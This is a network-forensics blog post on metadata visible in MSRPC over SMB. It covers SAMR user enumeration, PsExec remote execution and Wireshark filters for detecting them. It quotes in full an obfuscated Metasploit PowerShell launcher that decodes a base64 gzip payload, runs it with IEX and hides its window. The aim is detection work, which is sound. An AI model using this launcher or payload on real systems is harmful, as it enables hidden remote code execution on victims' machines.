loading...
Cover image for SMB: metadata in RPC
NetrixOne

SMB: metadata in RPC

stuchl4n3k profile image Petr Stuchlík ・4 min read

They call it DCE/RPC, but at the end of the day it's just a huge pile of cleartext metadata on your network.

This is another article in the series on metadata for network forensics. In the previous article I gave some examples of metadata hiding in common SMB file transfers and today I am going to briefly describe Remote Procedure Calls over SMB.

While Samba is mostly known as a file and printer sharing solution, it also provides Named Pipes to facilitate communication between local and remote process.

Now, in Windows networks, Named Pipes are typically used by MSRPC protocol. MSRPC is basicly an implementation of Distributed Computing Environment Remote Procedure Call (DCE/RPC) protocol used to execute functions on the remote endpoint and to transfer data. This allows MSRPC to copy files, work with remote Windows registry and manage Windows services while having the benefit of SMB authentication layer (since a named pipe is just another type of a "share"). Following services are typical examples of MSRPC traffic generators:

  • MS Sharing
  • MS Security (NLMSSP)
  • MS Active Directory
  • MS Print
  • MS Terminal Server
  • MS Remote Services

So e.g. Spoolsvc.exe can generate a packet which looks like this:

+-------------------------------+
|              IP               |
+-------------------------------+
|             TCP               |
+-------------------------------+
|        SMB Named Pipe         |
+-------------------------------+
|        MSRPC (DCE/RPC)        |
+-------------------------------+
|     Print Spooler Service     |
+-------------------------------+

401TRG compiled an excellent resource on this topic and packet samples in the following sections are borrowed from their work.

Domain users enumeration

Security Account Manager (SAMR) protocol uses SMB as one of its transport protocols. In this case, SMB connects to samr pipe on IPC$ share. It can then invoke SAMR methods to enumerate domains (samr.opnum == 6), domain users (samr.opnum == 13), query user info (samr.opnum == 36) etc. Following filter shows packets with user information.

samr user enum packet

Wireshark filter: samr.samr_EnumDomainUsers.sam or samr.samr_QueryUserInfo.info
PCAP sample: smb_net_user.pcap by 401TRG

PsExec

PsExec is a popular Sysinternals Suite tool for remote administration in Active Directory environments and is often an attacker's favorite choice for remote code execution attacks. A deep dive to PsExec is can by found in this blog.

In a basic attack scenario a binary PSEXESVC.exe is transferred over SMB
protocol to a victim machine using ADMIN$ share. It is then executed remotely as a temporary service using IPC$ share. Following filter will match SMB transfers and invocations of PsExec based on filename detection.

Wireshark filter: smb.file ~ "PSEXESVC" or smb2.filename ~ "PSEXESVC" or svcctl.servicename ~ "PSEXESVC"
PCAP sample: smb_psexec_add_user.pcap by 401TRG

It is however worth noting that such a file transfer usually triggers alarms so PsExec modules like Metasploit attempt to evade it using PowerShell invocation via RPC. An example how Metasploit obfuscates its payload:

%COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAIfj8FkCA71WbW/aSBD+nEr9D1aFZFsl2BDaNJEqnW0gEDABHCDAoWhjr+2FtZfY6/DS63+/MdgNVZoq1w9ngbwvM7vPPvPMjt0ktDlhoeB0y8OF3
/YuhG/v3530UIQCQSr4y6ZxnxSFwkOX+BEn8skJzBaCbmt037OGdC18FaSZtlrVWIBIOL+8NJIowiE/9EtXmGtxjIMHSnAsycI
/wtjHET69eVhgmwvfhMJ96YqyB0Qzs62BbB8Lp1ropHMdZqMUXslaUcIl8e+/RXl2Wp6X6o8JorEkWtuY46DkUCrKwnc53fB2u8KSaBI7YjFzeWlMwrNKaRjGyMVdWO0Jm5j7zIlFGc4CvwjzJAqFo1OlyxyMJBGavYjZmuNEOAafUit8YkssFcKE0qLwlzTLMAySkJMAwzzHEVtZOHoiNo5LTRQ6FA+wO5e6eJ0f
/a1O0rETWPV4JBchMq+CNZmTUHzwF+WXcLOYyvAcxRWo+P7+3ft3bq6HhVpF1xN3MDg7FgS0Tmb7Nga8Uo/FZG/9VVCLggl7Is6iLXQLt1GC5bkwS6Mxm8+FAh2onduhXnx9iXJuD9Ye2d7A0GzEiDMHlyxUhU05Cax04nXN1bBLQlzbhiggdi4r6VfcY5fi/WlLuVkXUEliNoGdGqbYQzzlsSjMXrrVA8J
/+OoJoQ6ONBviFwMqCK38M5hDaCSxFZo4AJ4OfRHC4IKYcW6dCXib7572wUg0KIrjotBLIJvsomBhRLFTFLQwJtmUlnC2b4rPcM2EcmKjmOfLzeUfRGYbGiyMeZTYEDs4/K21wjZBNOWiKDSJg
/WtRbx8Y
/GXTBiIUhJ6sNITRAJGUgYsnioiAox59OWShXkrWFEcgNk+tRsUeZDIWSLsVYQ87IgvUOYaPwg6JSRn4ggjRNmijBeFEYk4XBEpuamW/hjC0f1wAGNEOIuJlCfNTN
/yVOSFDZk+erpubrxUohlLe04iDnw0IhboKMafqxaPgC3pg3JDDA2eSSukpq0vSVlbk3LLhP+QnLVY7dxpXy+aSlTb+K7Wiltms1frN5vVp2trVOVWvcXbvRY363eLhaU1B8MJn7a05i1Rl5PqbnVNdlZHcyYb5fNO361VfbNbeI47qbmud+5ag/KnBumMjb6uVlCnVk86Y32tq9W4TtbNPhn2l9cN
/jAZUTR0Fe+ufIHIphMtRmVm7lqaduWf2btrd3Tlm8520lQuxtWlVtc0I6yPGjprT
/RI6ykj5K3Yuu21zcAzNL1hEzztDxt6v9
/QteHV4rF2oXjge4d8fTyqkOnqbuBDvwEQ2opabTl4xyZ9IOmKacgbgI1nVGzfBZvaR03
/2GVxBS11pulg05g+Aq7JqtGjMH87rDBtRLt3SOtMtw1FKU96Va2pkvGVp6VLIk
/vIy1+qu1qSnnkMGf8qTtxldEdPVdqxu3KdhVFWTdrbXta3ny5Oa
/q6qMRkIA+VBzlYvhFD+FkvSfP6Y
/PB5vu9gH2GyrK6EMqHdBOwTfak+sjMbx235soin1EQSRwheeZ2mBRI7uPe4ykHpL0XKeXOAoxhdIGxS+Xu0Yps9P6cHR9Q4U61I05ZO4QmmeVX7Zk4Yeh
/Fw38qHLyykAhjR61nipg0OP+0V1c6aqcP+rm6oK5377UQ222kpHCxbTKnKg7OeN6H4jOc21gpPsIkzuw/+B1CzVfXg5byP1eew3s28iWi1mRLwY
/3ngPxH+ZzSMEeFgbsGNRfGhhP6OjUxNR58eechAKW72pJ+CNwk/7cJXyb
/ONMdWhAoAAA==''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);

Wireshark alone won't get you very far here, but sometimes you should be able to spot PowerShell in SMB packets and work from there:

Wireshark filter: smb.file ~ "POWERSHELL" or smb2.filename ~ "POWERSHELL" or svcctl.binarypathname ~ "POWERSHELL"
PCAP sample: smb_metasploit_psexec_pth_download_meterpreter.pcap by 401TRG


As you can see, RPC can be used to call remote functions, which can also mean starting a remote service, which in turn can do almost anything you want. Next time I am going to dig some bits in the SMB traffic which can provide useful in endpoint fingerprinting.

References

Discussion

pic
Editor guide